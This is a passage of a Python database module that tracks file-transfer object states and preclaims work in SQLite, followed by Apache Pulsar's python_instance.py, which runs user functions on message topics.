op_kwargs = op_kwargs if op_kwargs else dict()
update_dbe_list = list()
session = None
try:
session = self.dbtobj.session_get()
query = self.query_DbEntTargetObj.with_session(session)
query = query.filter(DbEntTargetObj.state == state)
for dbe in query:
tobj = TargetObj.from_dbe(dbe)
if op(tobj, *op_args, **op_kwargs):
update_dbe_list.append(tobj.to_db_dict())
if update_dbe_list:
session.bulk_update_mappings(DbEntTargetObj, update_dbe_list)
session.commit()
except:
exc_log(self._logger, logging.WARNING, 'db_tobj_iterate_in_state')
raise
finally:
self.dbtobj.session_release(session)
@staticmethod
def db_force_reconcile(dbe, force_reconcile_fhs):
'''
This is invoked from db_clear_backpointers() to indicate
that an object has lost a backpointer. Here we update
the object state to ensure that it is reconciled.
This can only happen if we are in the TRANSFER phase.
Caller has a session active and will commit it.
'''
if dbe.filehandle not in force_reconcile_fhs:
dbe.reconcile_vers = dbe.reconcile_vers + 1
if dbe.nlink == 1:
# Be sure this is not reaped and is instead reconciled
dbe.nlink = 2
if dbe.state == TargetObjState.DONE:
dbe.state = TargetObjState.INODE_PENDING
elif dbe.state == TargetObjState.ERROR:
# Push back pre_error_state so that if we retry, we will reconcile.
if dbe.pre_error_state > TargetObjState.INODE_WRITING:
dbe.pre_error_state = TargetObjState.INODE_PENDING
force_reconcile_fhs.add(dbe.filehandle)
def db_clear_backpointers(self, session, filehandle, force_reconcile_fhs):
'''
Remove all backpointers to the given filehandle. This includes
additional_backpointers as well as first_backpointer.
'''
# Delete all DbEntAdditionalBackpointerMapEnt that point to filehandle
query_abp = self.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
query_fbp = self.query_DbEntTargetObj.with_session(session)
query_result = list(query_abp.filter(DbEntAdditionalBackpointerMapEnt.filehandle_to == filehandle.bytes))
for bpe in query_result:
if bpe.filehandle_from not in force_reconcile_fhs:
dbe = query_fbp.get(bpe.filehandle_from)
if dbe:
self.db_force_reconcile(dbe, force_reconcile_fhs)
session.delete(bpe)
# commit now so the query below does not see the things we deleted
session.commit()
# clear first_backpointer for all entries that match
query = query_fbp.filter(DbEntTargetObj.first_backpointer == filehandle.bytes)
for dbe in query:
dbe.first_backpointer = FILEHANDLE_NULL_BYTES
self.db_force_reconcile(dbe, force_reconcile_fhs)
# Pull up additional backpointers
for bpe in query_abp.filter(DbEntAdditionalBackpointerMapEnt.filehandle_from == dbe.filehandle).limit(1):
dbe.first_backpointer = bpe.filehandle_to
if bpe.count > 1:
bpe.count = bpe.count - 1
else:
session.delete(bpe)
# commit now so subsequent calls see the pullup results
session.commit()
def _dump_meta(self, session):
'Dump metastore contents from the given session for debugging'
query = self.query_DbEntMeta.with_session(session).order_by(DbEntMeta.m_key)
md_dict = {md.m_key : DbEntMetaKey.value_from_dbe(md.m_key, md.m_value) for md in query}
mt = [(k, md_dict[k]) for k in sorted(md_dict.keys())]
print(pprint.pformat(mt))
def dump(self):
'Dump DB contents for debugging'
session = self.dbmeta.session_get()
try:
self._dump_meta(session)
finally:
self.dbmeta.session_release(session)
session = self.dbtobj.session_get()
try:
self._dump_meta(session)
query = self.query_DbEntTargetObj.with_session(session)
bpquery = self.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
for dbe in query.order_by(DbEntTargetObj.filehandle):
tobj = TargetObj.from_dbe(dbe)
self.db_load_additional_backpointers_for_tobj(bpquery, tobj)
print('\n' + tobj.pformat())
qs = ('PRAGMA cache_size;',
'PRAGMA cache_spill;',
'PRAGMA journal_mode;',
'PRAGMA max_page_count;',
'PRAGMA mmap_size;',
'PRAGMA page_size;',
)
conn = query._connection_from_session(close_with_result=True) # pylint: disable=protected-access
for q in qs:
res = conn.execute(q)
while True:
one = res.fetchone()
if not one:
break
d = {k : one[k] for k in one.keys()}
print("%s %s" % (q, pprint.pformat(d)))
finally:
self.dbtobj.session_release(session)
def wake_all(self):
'''
Wake all background threads
'''
notify_all(self.fhseq_run_cond)
notify_all(self.fhseq_get_cond)
notify_all(self.toc_run_cond)
notify_all(self.toc_flush_cond)
class _UpdateStateDesc():
'Describe one dbc_update_state() request'
def __init__(self, state, child_dir_count, size):
self.state = state
self.child_dir_count = child_dir_count
self.size = size
self.tobj = None
def __bool__(self):
'True iff this _UpdateStateDesc modifies anything'
return (self.state is not None) or (self.child_dir_count is not None) or (self.size is not None)
def add(self, other):
'Overwrite settings in self with non-None settings from other'
if other.state is not None:
self.state = other.state
if other.child_dir_count is not None:
self.child_dir_count = other.child_dir_count
if other.size is not None:
self.size = other.size
class _DBSessionWrapper():
'''
Wrap session management for one database.
'''
def __init__(self, logger, filepath):
self._logger = logger
self._filepath = os.path.abspath(filepath)
self._uri = 'sqlite:///' + self._filepath
if not os.path.exists(self._filepath):
# We must set the page_size here before sqlalchemy
# slips in and starts issuing commands.
logger.debug("precreate %s", self._filepath)
conn = None
cursor = None
try:
conn = sqlite3.connect(self._filepath)
cursor = conn.cursor()
cursor.execute("PRAGMA page_size=%d;" % _PAGE_SIZE)
# Create a table so we do something with the page_size.
# Otherwise, it's gone when a new connection comes along to
# create a real table.
cursor.execute("CREATE TABLE bogus(key INTEGER, value INTEGER, PRIMARY KEY (key));")
finally:
if cursor:
cursor.close()
cursor = None
if conn:
conn.commit()
conn.close()
del conn
self._engine = sqlalchemy.create_engine(self._uri)
self._count = 0
def __str__(self):
return "%s(%s)" % (self.__class__.__name__, self._filepath)
def __repr__(self):
return "<%s,%s,%s>" % (self.__class__.__name__, hex(id(self)), self._filepath)
def __del__(self):
if hasattr(self, '_logger') and hasattr(self, '_count'):
if self._count:
self._logger.warning("%s del with outstanding count %d", self, self._count)
def create_all(self):
'''
Create all tables for this session. This implies that we are starting a new run.
'''
self._logger.debug("Create new DB %s", self._filepath)
DbEntBase.metadata.create_all(self._engine)
def session_get(self):
'''
Generate and return a new session with the transaction started.
The caller is responsible for using session_release() to
destroy the session. This performs no sanity checks
on the overall DB state - callers such as db_count_all()
rely on that.
'''
ret = Session(bind=self._engine, autoflush=False, _enable_transaction_accounting=False)
self._count += 1
return ret
def session_release(self, session):
'Destroy a session previous obtained from session_get()'
if session is not None:
self._count -= 1
session.rollback()
class PreclaimState():
'''
Encapsulate state about preclaimed target objects. A target object
is preclaimed if it is marked claimed in the table but no worker
thread is currently processing it. We try to keep a minimum level
of preclaimed objects so that worker threads do not stall waiting
to mark objects claimed. No locking in this obj; the caller (dbc_*
methods of ClfsLoadDB) is responsible for that.
'''
dirs_generating_min = 2
def __init__(self, logger):
self._logger = logger
# Phase.TRANSFER
self._writing_data = list()
self._writing_nodata = list()
self._generating_dirs = list()
self._pend_writing_data = list()
self._pend_writing_nodata = list()
self._pend_generating_dirs = list()
self._tobj_index = dict()
self._tobj_active = dict()
# Phase.RECONCILE
self._writing_inodes = list()
self._pend_writing_inodes = list()
# Phase.CLEANUP
self._cleaning_inodes = list()
self._pend_cleaning_inodes = list()
self._phase = None
self._lowat_count = 0 # low-water count; preclaim more if we have fewer than hits
self._hiwat_count = 0 # when we preclaim, aim for this many
self._preclaim_max_at_once = 1 # max query size for preclaim
self.accepted_all_offers = True # fastpath out of preclaim_more()
self.get_one = None # proc, set in phase.setter
def __len__(self):
if self._phase == Phase.TRANSFER:
return len(self._tobj_index) \
+ len(self._pend_writing_data) \
+ len(self._pend_writing_nodata) \
+ len(self._pend_generating_dirs)
if self._phase == Phase.RECONCILE:
return len(self._writing_inodes) + len(self._pend_writing_inodes)
if self._phase == Phase.CLEANUP:
return len(self._cleaning_inodes) + len(self._pend_cleaning_inodes)
return 0
def __bool__(self):
'''
Return whether there is anything preclaimed. Must include pend_*
so that flushing knows if has pending preclaim.
'''
if self._phase == Phase.TRANSFER:
if self._tobj_index \
or self._pend_writing_data \
or self._pend_writing_nodata \
or self._pend_generating_dirs:
return True
return False
if self._phase == Phase.RECONCILE:
if self._writing_inodes or self._pend_writing_inodes:
return True
return False
if self._phase == Phase.CLEANUP:
if self._cleaning_inodes or self._pend_cleaning_inodes:
return True
return False
return False
@property
def phase(self):
return self._phase
_TRANSFER_LOWAT = 300
_TRANSFER_HIWAT = 10000
_TRANSFER_PRECLAIM_MAX_AT_ONCE = 1000
_RECONCILE_LOWAT = 600
_RECONCILE_HIWAT = 10000
_RECONCILE_PRECLAIM_MAX_AT_ONCE = 150
_CLEANUP_LOWAT = 5000
_CLEANUP_HIWAT = 10000
_CLEANUP_PRECLAIM_MAX_AT_ONCE = 150
@phase.setter
def phase(self, value):
self._phase = value
if self._phase == Phase.TRANSFER:
self._lowat_count = self._TRANSFER_LOWAT
self._hiwat_count = self._TRANSFER_HIWAT
self._preclaim_max_at_once = self._TRANSFER_PRECLAIM_MAX_AT_ONCE
self.get_one = self._get_one_transfer
elif self._phase == Phase.RECONCILE:
self._lowat_count = self._RECONCILE_LOWAT
self._hiwat_count = self._RECONCILE_HIWAT
self._preclaim_max_at_once = self._RECONCILE_PRECLAIM_MAX_AT_ONCE
self.get_one = self._get_one_reconcile
elif self._phase == Phase.CLEANUP:
self._lowat_count = self._CLEANUP_LOWAT
self._hiwat_count = self._CLEANUP_HIWAT
self._preclaim_max_at_once = self._CLEANUP_PRECLAIM_MAX_AT_ONCE
self.get_one = self._get_one_cleanup
else:
self._lowat_count = 0
self._hiwat_count = 0
self._preclaim_max_at_once = 150
def ready_count(self):
'Return the number of items ready for claim'
return len(self._tobj_index) \
+ len(self._writing_inodes) \
+ len(self._cleaning_inodes)
def want_more(self):
'Return True if we should fetch more'
# Skip considering the extra generating dir to avoid repeatedly
# forcing flushes that do not find it. Just consider low-water.
return len(self) < self._lowat_count
def load_startup(self, db, reset_dirs=True):
'''
Load all claimed target objects. This is done irrespective
of target counts. It is called outside any extant transaction.
If reset_dirs is set, clear backpointers from existing dirs.
'''
# Only Ftype.DIR may be GENERATING
# Clear backpointers before loading.
self._generating_dirs = db.db_tobj_list_in_state(TargetObjState.GENERATING)
if reset_dirs:
session = None
try:
session = db.dbtobj.session_get()
query_f = db.query_DbEntTargetObj.with_session(session)
force_reconcile_fhs = set()
for tobj in self._generating_dirs:
dbe = query_f.get(tobj.filehandle.bytes)
if dbe:
db.db_force_reconcile(dbe, force_reconcile_fhs)
db.db_clear_backpointers(session, tobj.filehandle, force_reconcile_fhs)
del force_reconcile_fhs
session.commit()
finally:
db.dbtobj.session_release(session)
# Reload generating_dirs - we may have changed backpointers above
self._generating_dirs = db.db_tobj_list_in_state(TargetObjState.GENERATING, ic_restored_in_progress=True)
self._generating_dirs.sort(key=lambda tobj: tobj.size)
self._tobj_index = {tobj.filehandle : tobj for tobj in self._generating_dirs}
# For selection purposes, treat DIR, REG, and LNK together -
# they are all variable-length types, and we would rather
# service larger ones first.
tobjs = db.db_tobj_list_in_state(TargetObjState.WRITING, ic_restored_in_progress=True)
for tobj in tobjs:
if tobj.ftype in DATA_FTYPES:
self._writing_data.append(tobj)
else:
self._writing_nodata.append(tobj)
self._tobj_index[tobj.filehandle] = tobj
self._writing_data.sort(key=lambda tobj: tobj.size)
self._writing_inodes = db.db_tobj_list_in_state(TargetObjState.INODE_WRITING, ic_restored_in_progress=True)
self._cleaning_inodes = db.db_tobj_list_in_state(TargetObjState.INODE_CLEANUP_CLEANING, ic_restored_in_progress=True)
def preclaim_offer(self, tobj):
'''
Offer a tobj to preclaim. This is done while flushing.
If interested, modify the tobj to reflect the preclaim
and append to the correct pend list. This works without
locks because the pend lists are not visible until
pend_committed().
BEWARE: This operates without copying the tobj.
Only upserting objects are offered, and that only
happens during Phase.TRANSFER.
'''
assert (self._phase == Phase.TRANSFER) or (self._phase == Phase.INIT)
if tobj.state == TargetObjState.PENDING:
have = len(self._tobj_index)
have += len(self._pend_writing_data) + len(self._pend_writing_nodata) + len(self._pend_generating_dirs)
if tobj.ftype == Ftype.DIR:
have_generating = len(self._generating_dirs) + len(self._pend_generating_dirs)
if (have_generating < self.dirs_generating_min) or (have < self._hiwat_count):
tobj.state = TargetObjState.GENERATING
self._pend_generating_dirs.append(tobj)
else:
self.accepted_all_offers = False
else:
if have < self._hiwat_count:
tobj.state = TargetObjState.WRITING
if tobj.ftype <= Ftype.LNK:
self._pend_writing_data.append(tobj)
else:
self._pend_writing_nodata.append(tobj)
else:
self.accepted_all_offers = False
def preclaim_add_pend_writing_data(self, tobj):
'''
Add the given tobj to _pend_writing_data
'''
self._pend_writing_data.append(tobj)
def preclaim_update_for_add_backpointer(self, dbe):
'''
dbe is updated within a flush. If we have it in a writing or
generating list, update it
'''
filehandle = Filehandle(dbe.filehandle)
try:
tobj = self._tobj_index[filehandle]
except KeyError:
try:
tobj = self._tobj_active[filehandle]
except KeyError:
return
tobj.pend_first_backpointer = Filehandle(dbe.first_backpointer)
tobj.pend_nlink = dbe.nlink
return
tobj.first_backpointer = Filehandle(dbe.first_backpointer)
tobj.nlink = dbe.nlink
def preclaim_more(self, db, session, query):
if self.accepted_all_offers:
return
db.check_usable()
if self._phase == Phase.TRANSFER:
self._preclaim_more_transfer(query)
elif self._phase == Phase.RECONCILE:
self._preclaim_more_reconcile(db, session, query)
elif self._phase == Phase.CLEANUP:
self._preclaim_more_cleanup(query)
def _preclaim_more_transfer(self, query):
'''
This is called from within a flush operation during the TRANSFER phase.
Lay claim to more objects.
'''
have = len(self._tobj_index)
have += len(self._pend_writing_data) + len(self._pend_writing_nodata) + len(self._pend_generating_dirs)
if (have > self._hiwat_count) and self._generating_dirs:
return
remaining = self._hiwat_count - have
remaining = min(remaining, self._preclaim_max_at_once)
query = query.filter(DbEntTargetObj.state == TargetObjState.PENDING)
# Something to think about: Should this query order by size, pulling largest first?
# That would require additional disk accesses to the DB to support the
# additional indexing required. If we start distributing the work across many
# threads on many nodes, this could become more important to reduce
# the likelihood that a small number of large objects appear at the end .
if remaining > 0:
query2 = query.filter(DbEntTargetObj.ftype > Ftype.DIR).filter(DbEntTargetObj.ftype <= Ftype.LNK).limit(remaining)
count = 0
for dbe in query2:
dbe.state = TargetObjState.WRITING
self._pend_writing_data.append(TargetObj.from_dbe(dbe))
count += 1
remaining -= count
if remaining > 0:
query2 = query.filter(DbEntTargetObj.ftype > Ftype.LNK).limit(remaining)
count = 0
for dbe in query2:
dbe.state = TargetObjState.WRITING
self._pend_writing_nodata.append(TargetObj.from_dbe(dbe))
count += 1
remaining -= count
# We want to retire leaves over dirs to keep down the size of the table.
# If we strictly prioritize leaves, we can introduce stalls when we wait
# to start generating a dir. Our caller (dbc_flush) will hint to get_one_*()
# when it would rather have a dir, but we want to be sure to keep at least some,
# even if that puts us one over the high-water mark.
dga = self.dirs_generating_min - len(self._generating_dirs)
remaining2 = max(remaining, dga)
if remaining2 > 0:
query2 = query.filter(DbEntTargetObj.ftype == Ftype.DIR).limit(remaining2)
count = 0
for dbe in query2:
dbe.state = TargetObjState.GENERATING
self._pend_generating_dirs.append(TargetObj.from_dbe(dbe))
count += 1
remaining -= count
def _preclaim_more_reconcile(self, db, session, query):
'''
This is called from within a flush operation during the RECONCILE phase.
Lay claim to more objects.
'''
remaining = self._hiwat_count - len(self._writing_inodes)
remaining = min(remaining, self._preclaim_max_at_once)
if remaining > 0:
query = query.filter(DbEntTargetObj.state == TargetObjState.INODE_PENDING)
query = query.limit(remaining)
bpquery = db.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
for dbe in query:
dbe.state = TargetObjState.INODE_WRITING
dbe.reconcile_vers = dbe.reconcile_vers + 1
tobj = TargetObj.from_dbe(dbe)
# The writer needs to know the backpointers and the accurate
# link count, so load them here.
if tobj.ftype != Ftype.DIR:
db.db_load_additional_backpointers_for_tobj(bpquery, tobj)
self._pend_writing_inodes.append(tobj)
def _preclaim_more_cleanup(self, query):
'''
This is called from within a flush operation during the CLEANUP phase.
Lay claim to more objects.
'''
remaining = self._hiwat_count - len(self._cleaning_inodes)
remaining = min(remaining, self._preclaim_max_at_once)
if remaining > 0:
query = query.filter(DbEntTargetObj.state == TargetObjState.INODE_CLEANUP_PENDING)
query = query.limit(remaining)
for dbe in query:
dbe.state = TargetObjState.INODE_CLEANUP_CLEANING
tobj = TargetObj.from_dbe(dbe)
self._pend_cleaning_inodes.append(tobj)
def pend_committed(self):
'''
Called from flush after the commit has completed. Caller
holds the dbc lock. Move pending updates to committed.
'''
# These sorts are not global sorts by size of all pending objects -- just the ones we found.
# This provides bias towards favoring larger objects first without extra DB overhead.
if self._pend_writing_data:
for tobj in self._pend_writing_data:
self._tobj_index[tobj.filehandle] = tobj
self._tobj_active.pop(tobj.filehandle, None)
self._writing_data.extend(self._pend_writing_data)
# Sort smallest to largest. When we pop in _get_one_transfer(),
# we take the largest first.
self._writing_data.sort(key=lambda tobj: tobj.size)
self._pend_writing_data = list()
for tobj in self._pend_writing_nodata:
self._tobj_index[tobj.filehandle] = tobj
self._writing_nodata.extend(self._pend_writing_nodata)
self._pend_writing_nodata = list()
if self._pend_generating_dirs:
for tobj in self._pend_generating_dirs:
self._tobj_index[tobj.filehandle] = tobj
self._generating_dirs.extend(self._pend_generating_dirs)
# Sort smallest to largest. When we pop in _get_one_transfer(),
# we take the largest first.
self._generating_dirs.sort(key=lambda tobj: tobj.size)
self._pend_generating_dirs = list()
self._writing_inodes.extend(self._pend_writing_inodes)
self._pend_writing_inodes = list()
self._cleaning_inodes.extend(self._pend_cleaning_inodes)
self._pend_cleaning_inodes = list()
def _get_one_transfer(self):
'''
Get one preclaimed item during the transfer phase.
'''
if self.want_more():
try:
ret = self._generating_dirs.pop()
self._tobj_index.pop(ret.filehandle, None)
self._tobj_active[ret.filehandle] = ret
return ret
except IndexError:
pass
try:
ret = self._writing_data.pop()
self._tobj_index.pop(ret.filehandle, None)
self._tobj_active[ret.filehandle] = ret
return ret
except IndexError:
pass
try:
ret = self._writing_nodata.pop()
self._tobj_index.pop(ret.filehandle, None)
self._tobj_active[ret.filehandle] = ret
return ret
except IndexError:
pass
try:
ret = self._generating_dirs.pop()
self._tobj_index.pop(ret.filehandle, None)
self._tobj_active[ret.filehandle] = ret
return ret
except IndexError:
pass
return None
def _get_one_reconcile(self):
'''
Get one preclaimed item during the reconcile phase.
'''
try:
return self._writing_inodes.pop()
except IndexError:
return None
def _get_one_cleanup(self):
'''
Get one preclaimed item during the cleanup phase.
'''
try:
return self._cleaning_inodes.pop()
except IndexError:
return None
class CLFSLoadDBThread(CLFSLoadThread):
'''
Class used for DB threads. No need to specialize
the class; this just helps other code (especially
test code) identify DB threads.
'''
# No specialization here
|
python_instance.py
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -*- encoding: utf-8 -*-
"""python_instance.py: Python Instance for running python functions
"""
import base64
import os
import signal
import time
try:
import Queue as queue
except:
import queue
import threading
import sys
import re
import pulsar
import contextimpl
import Function_pb2
import log
import util
import InstanceCommunication_pb2
# state dependencies
import state_context
from functools import partial
from collections import namedtuple
from function_stats import Stats
Log = log.Log
# Equivalent of the InstanceConfig in Java
InstanceConfig = namedtuple('InstanceConfig', 'instance_id function_id function_version function_details max_buffered_tuples')
# This is the message that the consumers put on the queue for the function thread to process
InternalMessage = namedtuple('InternalMessage', 'message topic serde consumer')
InternalQuitMessage = namedtuple('InternalQuitMessage', 'quit')
DEFAULT_SERIALIZER = "serde.IdentitySerDe"
PY3 = sys.version_info[0] >= 3
def base64ify(bytes_or_str):
if PY3 and isinstance(bytes_or_str, str):
input_bytes = bytes_or_str.encode('utf8')
else:
input_bytes = bytes_or_str
output_bytes = base64.urlsafe_b64encode(input_bytes)
if PY3:
return output_bytes.decode('ascii')
else:
return output_bytes
class PythonInstance(object):
def __init__(self,
instance_id,
function_id,
function_version,
function_details,
max_buffered_tuples,
expected_healthcheck_interval,
user_code,
pulsar_client,
secrets_provider,
cluster_name,
state_storage_serviceurl):
self.instance_config = InstanceConfig(instance_id, function_id, function_version, function_details, max_buffered_tuples)
self.user_code = user_code
# set queue size to one since consumers already have internal queues. Just use queue to communicate message from
# consumers to processing thread
self.queue = queue.Queue(1)
self.log_topic_handler = None
if function_details.logTopic is not None and function_details.logTopic != "":
self.log_topic_handler = log.LogTopicHandler(str(function_details.logTopic), pulsar_client)
self.pulsar_client = pulsar_client
self.state_storage_serviceurl = state_storage_serviceurl
self.input_serdes = {}
self.consumers = {}
self.output_serde = None
self.function_class = None
self.function_purefunction = None
self.producer = None
self.execution_thread = None
self.atmost_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATMOST_ONCE')
self.atleast_once = self.instance_config.function_details.processingGuarantees == Function_pb2.ProcessingGuarantees.Value('ATLEAST_ONCE')
self.auto_ack = self.instance_config.function_details.autoAck
self.contextimpl = None
self.last_health_check_ts = time.time()
self.timeout_ms = function_details.source.timeoutMs if function_details.source.timeoutMs > 0 else None
self.expected_healthcheck_interval = expected_healthcheck_interval
self.secrets_provider = secrets_provider
self.state_context = state_context.NullStateContext()
self.metrics_labels = [function_details.tenant,
"%s/%s" % (function_details.tenant, function_details.namespace),
function_details.name,
instance_id, cluster_name,
"%s/%s/%s" % (function_details.tenant, function_details.namespace, function_details.name)]
self.stats = Stats(self.metrics_labels)
def health_check(self):
self.last_health_check_ts = time.time()
health_check_result = InstanceCommunication_pb2.HealthCheckResult()
health_check_result.success = True
return health_check_result
def process_spawner_health_check_timer(self):
if time.time() - self.last_health_check_ts > self.expected_healthcheck_interval * 3:
Log.critical("Haven't received health check from spawner in a while. Stopping instance...")
os.kill(os.getpid(), signal.SIGKILL)
sys.exit(1)
def run(self):
# Setup state
self.state_context = self.setup_state()
# Setup consumers and input deserializers
mode = pulsar._pulsar.ConsumerType.Shared
if self.instance_config.function_details.source.subscriptionType == Function_pb2.SubscriptionType.Value("FAILOVER"):
mode = pulsar._pulsar.ConsumerType.Failover
subscription_name = str(self.instance_config.function_details.tenant) + "/" + \
str(self.instance_config.function_details.namespace) + "/" + \
str(self.instance_config.function_details.name)
properties = util.get_properties(util.getFullyQualifiedFunctionName(
self.instance_config.function_details.tenant,
self.instance_config.function_details.namespace,
self.instance_config.function_details.name),
self.instance_config.instance_id)
for topic, serde in self.instance_config.function_details.source.topicsToSerDeClassName.items():
if not serde:
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
else:
serde_kclass = util.import_class(os.path.dirname(self.user_code), serde)
self.input_serdes[topic] = serde_kclass()
Log.debug("Setting up consumer for topic %s with subname %s" % (topic, subscription_name))
self.consumers[topic] = self.pulsar_client.subscribe(
str(topic), subscription_name,
consumer_type=mode,
message_listener=partial(self.message_listener, self.input_serdes[topic]),
unacked_messages_timeout_ms=int(self.timeout_ms) if self.timeout_ms else None,
properties=properties
)
for topic, consumer_conf in self.instance_config.function_details.source.inputSpecs.items():
if not consumer_conf.serdeClassName:
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
else:
serde_kclass = util.import_class(os.path.dirname(self.user_code), consumer_conf.serdeClassName)
self.input_serdes[topic] = serde_kclass()
Log.debug("Setting up consumer for topic %s with subname %s" % (topic, subscription_name))
consumer_args = {
"consumer_type": mode,
"message_listener": partial(self.message_listener, self.input_serdes[topic]),
"unacked_messages_timeout_ms": int(self.timeout_ms) if self.timeout_ms else None,
"properties": properties
}
if consumer_conf.HasField("receiverQueueSize"):
consumer_args["receiver_queue_size"] = consumer_conf.receiverQueueSize.value
if consumer_conf.isRegexPattern:
self.consumers[topic] = self.pulsar_client.subscribe(
re.compile(str(topic)), subscription_name,
**consumer_args
)
else:
self.consumers[topic] = self.pulsar_client.subscribe(
str(topic), subscription_name,
**consumer_args
)
function_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.className)
if function_kclass is None:
Log.critical("Could not import User Function Module %s" % self.instance_config.function_details.className)
raise NameError("Could not import User Function Module %s" % self.instance_config.function_details.className)
try:
self.function_class = function_kclass()
except:
self.function_purefunction = function_kclass
self.contextimpl = contextimpl.ContextImpl(self.instance_config, Log, self.pulsar_client,
self.user_code, self.consumers,
self.secrets_provider, self.metrics_labels,
self.state_context, self.stats)
# Now launch a thread that does execution
self.execution_thread = threading.Thread(target=self.actual_execution)
self.execution_thread.start()
# start proccess spawner health check timer
self.last_health_check_ts = time.time()
if self.expected_healthcheck_interval > 0:
timer = util.FixedTimer(self.expected_healthcheck_interval, self.process_spawner_health_check_timer, name="health-check-timer")
timer.start()
def actual_execution(self):
Log.debug("Started Thread for executing the function")
while True:
try:
msg = self.queue.get(True)
if isinstance(msg, InternalQuitMessage):
break
Log.debug("Got a message from topic %s" % msg.topic)
# deserialize message
input_object = msg.serde.deserialize(msg.message.data())
# set current message in context
self.contextimpl.set_current_message_context(msg.message, msg.topic)
output_object = None
self.saved_log_handler = None
if self.log_topic_handler is not None:
self.saved_log_handler = log.remove_all_handlers()
log.add_handler(self.log_topic_handler)
successfully_executed = False
try:
# get user function start time for statistic calculation
self.stats.set_last_invocation(time.time())
# start timer for process time
self.stats.process_time_start()
if self.function_class is not None:
output_object = self.function_class.process(input_object, self.contextimpl)
else:
output_object = self.function_purefunction.process(input_object)
successfully_executed = True
# stop timer for process time
self.stats.process_time_end()
except Exception as e:
Log.exception("Exception while executing user method")
self.stats.incr_total_user_exceptions(e)
# If function throws exception then send neg ack for input message back to broker
msg.consumer.negative_acknowledge(msg.message)
if self.log_topic_handler is not None:
log.remove_all_handlers()
log.add_handler(self.saved_log_handler)
if successfully_executed:
self.process_result(output_object, msg)
self.stats.incr_total_processed_successfully()
except Exception as e:
Log.error("Uncaught exception in Python instance: %s" % e);
self.stats.incr_total_sys_exceptions(e)
if msg:
msg.consumer.negative_acknowledge(msg.message)
def done_producing(self, consumer, orig_message, topic, result, sent_message):
if result == pulsar.Result.Ok:
if self.auto_ack:
consumer.acknowledge(orig_message)
else:
error_msg = "Failed to publish to topic [%s] with error [%s] with src message id [%s]" % (topic, result, orig_message.message_id())
Log.error(error_msg)
self.stats.incr_total_sys_exceptions(Exception(error_msg))
# If producer fails send output then send neg ack for input message back to broker
consumer.negative_acknowledge(orig_message)
def process_result(self, output, msg):
if output is not None and self.instance_config.function_details.sink.topic != None and \
len(self.instance_config.function_details.sink.topic) > 0:
if self.output_serde is None:
self.setup_output_serde()
if self.producer is None:
self.setup_producer()
# serialize function output
output_bytes = self.output_serde.serialize(output)
if output_bytes is not None:
props = {"__pfn_input_topic__" : str(msg.topic), "__pfn_input_msg_id__" : base64ify(msg.message.message_id().serialize())}
self.producer.send_async(output_bytes, partial(self.done_producing, msg.consumer, msg.message, self.producer.topic()), properties=props)
elif self.auto_ack and self.atleast_once:
msg.consumer.acknowledge(msg.message)
def setup_output_serde(self):
if self.instance_config.function_details.sink.serDeClassName != None and \
len(self.instance_config.function_details.sink.serDeClassName) > 0:
serde_kclass = util.import_class(os.path.dirname(self.user_code), self.instance_config.function_details.sink.serDeClassName)
self.output_serde = serde_kclass()
else:
global DEFAULT_SERIALIZER
serde_kclass = util.import_class(os.path.dirname(self.user_code), DEFAULT_SERIALIZER)
self.output_serde = serde_kclass()
def setup_producer(self):
if self.instance_config.function_details.sink.topic != None and \
len(self.instance_config.function_details.sink.topic) > 0:
Log.debug("Setting up producer for topic %s" % self.instance_config.function_details.sink.topic)
batch_type = pulsar.BatchingType.Default
if self.instance_config.function_details.sink.producerSpec.batchBuilder != None and \
len(self.instance_config.function_details.sink.producerSpec.batchBuilder) > 0:
batch_builder = self.instance_config.function_details.sink.producerSpec.batchBuilder
if batch_builder == "KEY_BASED":
batch_type = pulsar.BatchingType.KeyBased
self.producer = self.pulsar_client.create_producer(
str(self.instance_config.function_details.sink.topic),
block_if_queue_full=True,
batching_enabled=True,
batching_type=batch_type,
batching_max_publish_delay_ms=10,
compression_type=pulsar.CompressionType.LZ4,
# set send timeout to be infinity to prevent potential deadlock with consumer
# that might happen when consumer is blocked due to unacked messages
send_timeout_millis=0,
properties=util.get_properties(util.getFullyQualifiedFunctionName(
self.instance_config.function_details.tenant,
self.instance_config.function_details.namespace,
self.instance_config.function_details.name),
self.instance_config.instance_id)
)
def setup_state(self):
table_ns = "%s_%s" % (str(self.instance_config.function_details.tenant),
str(self.instance_config.function_details.namespace))
table_ns = table_ns.replace("-", "_")
table_name = str(self.instance_config.function_details.name)
return state_context.create_state_context(self.state_storage_serviceurl, table_ns, table_name)
def message_listener(self, serde, consumer, message):
# increment number of received records from source
self.stats.incr_total_received()
item = InternalMessage(message, message.topic_name(), serde, consumer)
self.queue.put(item, True)
if self.atmost_once and self.auto_ack:
consumer.acknowledge(message)
def get_and_reset_metrics(self):
# First get any user metrics
metrics = self.get_metrics()
self.reset_metrics()
return metrics
def reset_metrics(self):
self.stats.reset()
self.contextimpl.reset_metrics()
def get_metrics(self):
total_received = self.stats.get_total_received()
total_processed_successfully = self.stats.get_total_processed_successfully()
total_user_exceptions = self.stats.get_total_user_exceptions()
total_sys_exceptions = self.stats.get_total_sys_exceptions()
avg_process_latency_ms = self.stats.get_avg_process_latency()
last_invocation = self.stats.get_last_invocation()
total_received_1min = self.stats.get_total_received_1min()
total_processed_successfully_1min = self.stats.get_total_processed_successfully_1min()
total_user_exceptions_1min = self.stats.get_total_user_exceptions_1min()
total_sys_exceptions_1min = self.stats.get_total_sys_exceptions_1min()
avg_process_latency_ms_1min = self.stats.get_avg_process_latency_1min()
